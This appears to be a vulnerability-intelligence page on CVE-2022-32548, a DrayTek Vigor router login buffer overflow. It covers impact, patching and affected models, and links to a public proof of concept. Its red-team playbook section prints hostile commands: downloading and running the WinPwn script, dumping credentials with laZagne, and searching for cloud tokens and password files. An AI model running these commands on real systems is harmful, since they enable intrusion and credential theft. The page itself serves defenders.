CVE-2022-32548
Overview
This vulnerability is a stack-based buffer overflow in the authentication CGI endpoint of specific DrayTek Vigor routers. It arises from improper bounds checking on input parameters 'aa' and 'ab' within the /cgi-bin/wlogin.cgi script. The flaw affects the router's web login component, allowing crafted input to overwrite memory buffers.
Vulnerability Description
An issue was discovered on certain DrayTek Vigor routers before July 2022 such as the Vigor3910 before 4.3.1.1. /cgi-bin/wlogin.cgi has a buffer overflow via the username or password to the aa or ab field.
Impact
An unauthenticated attacker with network access to the router's web interface can exploit this buffer overflow to execute arbitrary code with elevated privileges. This can lead to full compromise of the device, including unauthorized configuration changes, data interception, or pivoting within the network. The vulnerability is exploitable remotely without user interaction, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N, making it critical in environments exposing the management interface externally.
Solution
DrayTek has released firmware updates addressing this vulnerability; affected models such as the Vigor3910 should be upgraded to version 4.3.1.1 or later. Detailed patch instructions and version-specific advisories are available via vendor communications and referenced security reports (e.g., https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/rce-in-dratyek-routers.html). Network administrators should apply these updates promptly to mitigate the risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in certain models of DrayTek Vigor routers, specifically those prior to firmware version 4.3.1.1. This issue arises from a buffer overflow in the web interface, particularly within the login mechanism located at /cgi-bin/wlogin.cgi. The vulnerability is triggered when an attacker supplies excessively long input in the username or password fields, specifically targeting the 'aa' or 'ab' fields. This overflow can lead to arbitrary code execution, allowing an attacker to gain unauthorized access to the router's administrative functions or potentially execute malicious payloads.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate a remote attack by sending specially crafted requests to the router's web interface. Given that many routers are often exposed to the internet, this vulnerability presents a significant risk, as it does not require physical access to the device. Additionally, if the attacker can successfully exploit the buffer overflow, they could manipulate the router's firmware, redirect traffic, or even launch further attacks on internal networks. Scenarios could include the installation of backdoors, interception of sensitive data, or the creation of botnets for distributed denial-of-service (DDoS) attacks.
The real-world impact of this vulnerability is substantial, particularly for businesses relying on these routers for network connectivity and security. Successful exploitation can lead to severe disruptions, data breaches, and loss of customer trust. Organizations may face regulatory penalties if sensitive data is compromised, especially in sectors that are heavily regulated. The financial implications can be significant, encompassing costs related to incident response, system recovery, and potential legal liabilities. Furthermore, the reputational damage can have long-lasting effects, deterring customers and partners from engaging with affected organizations.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating router firmware is essential to protect against known vulnerabilities; therefore, users should ensure that their DrayTek Vigor routers are running the latest versions. Network monitoring tools can help identify unusual traffic patterns or unauthorized access attempts, providing early warning signs of exploitation attempts. Additionally, organizations should consider implementing firewalls and intrusion detection systems to limit exposure to potential attackers. Educating staff about the importance of strong, unique passwords can also reduce the risk of exploitation through brute-force attacks.
In conclusion, the vulnerability present in certain DrayTek Vigor routers poses a significant threat to both individual users and organizations. The potential for remote exploitation through buffer overflow attacks highlights the need for robust security practices, including timely firmware updates and proactive network monitoring. By understanding the technical details, attack vectors, and potential impacts of this vulnerability, organizations can better prepare their defenses and mitigate the associated risks.
Affected Products (68)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Draytek | Vigor3910 Firmware | All |
cpe:2.3:o:draytek:vigor3910_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor1000b Firmware | All |
cpe:2.3:o:draytek:vigor1000b_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2962 Firmware | All |
cpe:2.3:o:draytek:vigor2962_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2962p Firmware | All |
cpe:2.3:o:draytek:vigor2962p_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2927 Firmware | All |
cpe:2.3:o:draytek:vigor2927_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2927ax Firmware | All |
cpe:2.3:o:draytek:vigor2927ax_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2927ac Firmware | All |
cpe:2.3:o:draytek:vigor2927ac_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2927vac Firmware | All |
cpe:2.3:o:draytek:vigor2927vac_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2927l Firmware | All |
cpe:2.3:o:draytek:vigor2927l_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2927lac Firmware | All |
cpe:2.3:o:draytek:vigor2927lac_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2915 Firmware | All |
cpe:2.3:o:draytek:vigor2915_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2915ac Firmware | All |
cpe:2.3:o:draytek:vigor2915ac_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2952 Firmware | All |
cpe:2.3:o:draytek:vigor2952_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2952p Firmware | All |
cpe:2.3:o:draytek:vigor2952p_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor3220 Firmware | All |
cpe:2.3:o:draytek:vigor3220_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2926 Firmware | All |
cpe:2.3:o:draytek:vigor2926_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2926n Firmware | All |
cpe:2.3:o:draytek:vigor2926n_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2926ac Firmware | All |
cpe:2.3:o:draytek:vigor2926ac_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2926vac Firmware | All |
cpe:2.3:o:draytek:vigor2926vac_firmware:*:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2926l Firmware | All |
cpe:2.3:o:draytek:vigor2926l_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
MosaedH/CVE-2022-32548-RCE-POC
|
MosaedH | 8 | 4 | 2023-10-27 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-32548 |
| securityweek.com |
GitHub CVE
x_refsource_MISC
|
https://www.securityweek.com/smbs-exposed-attacks-critical-vulnerability-draytek-vigor-routers |
| trellix.com |
GitHub CVE
x_refsource_MISC
|
https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/rce-in-dratyek-routers.html |